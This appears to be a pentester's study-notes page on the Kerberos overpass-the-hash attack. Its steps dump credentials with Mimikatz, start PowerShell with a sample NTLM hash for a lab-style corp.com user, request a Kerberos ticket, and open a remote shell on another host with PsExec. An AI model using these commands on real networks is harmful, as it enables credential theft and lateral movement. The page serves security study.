> For the complete documentation index, see [llms.txt](https://tamagosecurity.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://tamagosecurity.gitbook.io/notes/active-directory/kerberos-overpass-the-hash.md).

# Kerberos Overpass The Hash

{% stepper %}
{% step %}

### Run Mimikatz to dump credentials

```
privilege::debug
sekurlsa::logonpasswords
```

This step obtains usernames and NTLM hashes.
{% endstep %}

{% step %}

### Pass-the-hash with Mimikatz to spawn a shell

Replace with the desired user/domain/NTLM as needed.

```
sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell
```

{% endstep %}

{% step %}

### List cached Kerberos tickets

```
klist
```

{% endstep %}

{% step %}

### Attempt to authenticate to a file share

```
net use \\files04
```

{% endstep %}

{% step %}

### Check Kerberos tickets again

```
klist
```

{% endstep %}

{% step %}

### Use PsExec to authenticate and run a remote command

```
.\PsExec.exe \\files04 cmd
```

{% endstep %}
{% endstepper %}
